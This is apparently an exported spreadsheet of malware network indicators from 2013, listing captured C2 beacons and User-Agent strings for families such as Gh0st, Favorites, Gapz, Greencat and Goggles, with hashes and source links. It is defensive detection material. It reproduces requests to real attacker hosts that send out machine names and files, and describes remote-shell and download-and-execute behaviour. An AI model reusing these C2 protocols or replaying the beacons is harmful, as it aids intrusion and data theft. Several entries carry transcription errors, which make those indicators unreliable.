4/30/2013CrimeFakeAV var (via Kuluoz - Asprox botnet)GET /AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F HTTP/1.1GET /AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 208.88.5.229:808
808Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)b64b5af4262cf23f3fbc54448c6311d8http://www.nsai.it/2013/01/23/italian-dhl-spam/ https://www.virustotal.com/en/file/c49f7dbc036ad0a86df02cbbde00cb3b3fbd651d82f6c9c5a98170644374f64f/analysis/
77
4/30/2013APTFavoritesGET /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1GET /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.1)
Host: 140.112.19.195
Connection: Keep-Alive
Download file to victimMozilla/5.0 (compatible; Windows NT 5.1)5e3eaca3806769836c3ad9d46a2096442010-09http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
78
4/30/2013APTFavoritesGET /search?qu= HTTP/1.1GET /search?qu= HTTP/1.1
User-Agent: Firefox/2.0.0.2
Host: www.google.com
Content-Length: 4
Connection: Keep-Alive
Trojan first beacons to www.google.com. This is a decoy beacon that does not affect the behavior of the Trojan in any way:5e3eaca3806769836c3ad9d46a2096442010-09http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
79
4/30/2013APTFavoritesGET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (compatible;BKANAHEAFPEM;)
Host: 140.112.19.195
Connection: Keep-Alive
Where: search5 is a hardcoded value, whereas: 5910 is a random number.
And: ?h1= is hardcoded, whereas: 51 is the Windows version (i.e. Win XP 5.1)
And: &h2=1&h3= is hardcoded, as is: BHI06233
And: &h4= is hardcoded, whereas: FIFEFDAHAPGDENCMFOFMFMAEAE is the encoded (volume serial number concatenated with a random number)
And: BKANAHEAFPEM is the encoded machine name (in this case victim).
Mozilla/5.0 (compatible;BKANAHEAFPEM;)5e3eaca3806769836c3ad9d46a2096442010-09http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
80
4/30/2013APTFavoritesGET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.2)
Host: 140.112.19.195
Connection: Keep-Alive
The Trojan continues the communication with the C2 node by sending thisGET request:Mozilla/5.0 (compatible; Windows NT 5.2)5e3eaca3806769836c3ad9d46a2096442010-09http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
81
4/30/2013APTFavoritesPOST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH HTTP/1.1POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH HTTP/1.1
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.1)
Host: 140.112.19.195
Content-Length: 127
Connection: Keep-Alive
Cache-Control: no-cache
Command Shell
This command takes no arguments.
The Trojan executes cmd.exe on the local machine and sends the followingPOST request to the C2 node:
Mozilla/5.0 (compatible;Windows NT 5.1)5e3eaca3806769836c3ad9d46a2096442010-09http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
82
4/30/2013APTFavoritesPOST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE HTTP/1.1POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.2)
Host: 140.112.19.195
Content-Length: 41
Connection: Keep-Alive
Cache-Control: no-cache
POST request to the C2 node followed by the encrypted data of the requested file (shown as a hex dump):Agent: Mozilla/5.0 (compatible;Windows NT 5.2)5e3eaca3806769836c3ad9d46a2096442010-09http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
83
4/28/2013CrimeFlashback OSXGET /statistics.html HTTP/1.1GET /statistics.html HTTP/1.1
Host: cuojshtbohnt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.15616687FAC5D040AE65CB1B08717A6AA2012-04http://contagiodump.blogspot.com/2012/04/i-have-been-tracking-infections-too-and.html
84
4/28/2013APTFoxyPOST /404error.asp HTTP/1.1POST /404error.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)
Host: www.gobroadreach.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)d271ae0f4e9230af3b61eafe7f671fde2011-08http://www.cyberengineeringservices.com/364/
85
4/28/2013APTFoxy CheckinGET /images/leftnav_prog_bg.jpg HTTP/1.1GET /images/leftnav_prog_bg.jpg HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)
Host: www.gobroadreach.com
Cache-Control: no-cache
Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)d271ae0f4e9230af3b61eafe7f671fde2011-08http://www.cyberengineeringservices.com/364/
86
5/2/2013CrimeGameThiefGET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4D468A2&os=winxp%20Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 HTTP/1.1GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4D468A2&os=winxp%20Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 HTTP/1.1
User-Agent: Google page
Host: 198.105.210.180
Cache-Control: no-cache
User-Agent: Google pageECBA0FEB36F9EF975EE96D1694C8164C
4e4ea8acc683bdd054e032f8a2895c74
http://bit.ly/crimesampleshttp://bit.ly/crimepcaps2013-03http://www.threatexpert.com/report.aspx?md5=ecba0feb36f9ef975ee96d1694c8164c
87
5/1/2013CrimeGapz C&C requestPOST / HTTP/1.0
Host: hvqnut3kurg3lku.strangled.net
POST / HTTP/1.0
Host: hvqnut3kurg3lku.strangled.net
Content-Type: multipart/form-data: boundary-G5tlHz50h7nHCmL07Pi
Content-Length: 598
User-Agent: Moziila/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0

--GSt lHz5Oh?nHCnLO7Pi
Content-Disposition: form-data; name="”kchVFAau”; filename=BjaYJT0pQJjoeZ.7z”
Content-Type: application/octet—stream
Content-Transfer-Encoding: binary
Moziila/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0E5B9295E0B147501F47E2FCBA93DEB6C - dropper2013-04http://www.welivesecurity.com/2013/04/08/is-gapz-the-most-complex-bootkit-yet/
88
4/30/2013APTGh0stGET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache
Mozilla/4.0 (compatible; MSIE 6.0; Win32)04e237ad7f600bfc942f326f903dc9d8
6a5dde931418e0549163fdb024e4f2ed
265b38204738c9c0adc612142f861022
2013-04http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-pdfs-on-the-rise/
89
5/12/2013APTGh0stGh0st....d...x.Kc``....@....\..L@:8..,39U! 1Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1122B34A05530316E919604EF52EB9F1A2013-05http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html-
90
4/28/2013APTGh0st ASP verGET /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.O.69 HTTP/1.1GET /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.O.69 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR
1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: .palms-us.org
Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR2012http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
91
4/28/2013APTGh0st PHP verGET /ld/queenfun/vl /login.php?cd2hpdGU&uU11TVEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35lGET /ld/queenfun/vl /login.php?cd2hpdGU&uU11TVEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l
HTTP/1 .1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: . ibmunion.net
User-Agent: Mozilla/4.O (compatible; )2012http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
92
4/28/2013APTGh0st v2000 varv2010........f...............(
......Service Pack 2..?..|...|...|0.@..
v2010........f...............(
......Service Pack 2..?..|...|...|0.@..............4$..............4$..^.....|.....]...]......{l....$.0%.|.....a2.rSingleO....t.....2.........d
....j.DELLXT..............................................g...00-50-56-3C-F6-41...'.......
B1D09374006E20FA795B2E70BF566C6Dhttp://bit.ly/aptpcaps2012-08http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
93
4/30/2013APTGh0st varGET /h.gif ?pid =1 13&v=130586214568 HTTP/ 1. 1GET /h. gif ?pid =113&v=130586214568 HTTP/ 1. 1
Accept: /
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla /4.0(compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep- Alive

HTTP/1.0 200 0K
Content-type: text/html.
Content- l..ength:0
PCRatb . . . X. . . x . . . q. s. 2406. . . . S. . P. . c. 1. 4R. u. . .1—I . . . .1.1I
..al..bf.....ga..QUS.Z\..._\ s..PCRat x
Mozilla /4.0(compatible; MSIE 6.0; Windows NT 5.1)2012-06http://labs.alienvault.com/labs/index.php/2012/new-macontrol-variant-targeting-uyghur-users-the-windows-version-using-gh0st-rat/
94
4/29/2013APTGlassesGET /ewpindex.htm HTTP/1.1GET /ewpindex.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)
Host: ewplus.com
Cache-Control: no-cache
The HTTP request includes a marker in the User-Agent string, indicating that it is was sent by this malware: The marker string has two parts, separated by a period. The first part (“Clj26Dbj”) is an encoded version of the computer’s name, presumably for tracking which machines at an organization are infected. The second part (changed to “XYZ” here) appears to be a campaign code2013-02https://citizenlab.org/2013/02/apt1s-glasses-watching-a-human-rights-organization/
95
4/28/2013APTGoogleAdC2GET /html/lost.html HTTP/1.1GET /html/lost.html HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: news.googleupdateservices.com
Connection: Keep-Alive
The Trojan parses the HTML file data for the following content:
<!-- google_adINSTRUCTION height --> So, an example of what file lost.html may contain may look like this:
<!-- google_adad_heighthttp://www.reallybad.com/Trojan2.jpg height -->
90993b5279365b204148e8b04edf477f2011-11http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/
96
4/28/2013APTGoogleAdC2 2nd stageGET /Trojan2.jpg HTTP/1.1GET /Trojan2.jpg HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: www.reallybad.com
Connection: Keep-Alive
The downloaded file is expected to be Base64 encoded using the following custom alphabet:
abhijstuDEFGHIvwxynopqr5678QRS9+/TUzklmVWXYZABCJKLMNOP01cdefg234
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)90993b5279365b204148e8b04edf477f2011-11http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/
97
4/28/2013APTGooglesGET /sll/monica.jpg HTTP/1.1GET /sll/monica.jpg HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0;
=1j2CVh2s#IE6DBo6Iru; MNA)
Host: www.avvmail.com
Cache-Control: no-cache
GOGGLES will periodically request a pre-configured URL, which contains encoded commands to either sleep or download and execute another URL.The GOGGLES downloader makes extensive use of data encoding and encapsulation to obscure network traffic. GOGGLES is designed to request a URL that is stored encoded in its resource section and then extract and decode a second URL from the data returned from the server.The first HTTPGET request’s User-Agent string will include the encoded name of the local system. Below is an example of the first HTTPGET request:
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0;
Mozilla/4.0(compatible;WindowsNT5.1;MSIE8.0)
Mozilla/4.0(compatible;WindowsNT5.1;MSIE7.0;Trident/4.0
BF80DBF969B73790253F683CD723FD712009-07http://intelreport.mandiant.com/
98
4/28/2013APTGreencatGET /<HOSTNAME>/ HTTP/1.1GET /<HOSTNAME>/ HTTP/1.1
Accept: /
Pragma: no-cache
Cache-Control: max-age=0
Cache-Control: no-cache
Connection: Keep-Alive
Computer: <HOSTNAME>
User-Agent: Mozilla/4.0
Host: flash.aunewsonline.com
Content-Length: <ContentLength>

<HOSTNAME> Connected!
GREENCAT communicates using SSL. Within the SSL tunnel the initialGET request Mozilla/4.0Mozilla/4.0(compatible;MSIE8.0;WindowsNT5.1;SV1) o Mozilla/5.0
Mozilla/4.0
57e79f7df13c0cb01910d0c688fcd2962012-04http://intelreport.mandiant.com/
99
4/28/2013APTGtalkGET /facebook.png HTTP/1.1GET /facebook.png HTTP/1.1
Accept: /
User-Agent: [redacted] +Mozllla/4.0 (compatible; MSIE 8.0; Win32)
Host: [redacted]
User-Agent: [redacted] +Mozllla/4.0 (compatible; MSIE 8.0; Win32)2012http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
100
4/30/2013CrimeGuntior - CN bootkitGET /yx/tongji.html HTTP/1.1GET /yx/tongji.html HTTP/1.1
Accept: /..
Accept-Language: en-u
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: localhost:690
Connection: Keep-Alive
Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727)15e692cf34a70fb364591622bff1e43a2012-12http://www.threatexpert.com/report.aspx?md5=15e692cf34a70fb364591622bff1e43a
Loading...
 
 
 
Malware
EZlookup
Links
TBD
Form Responses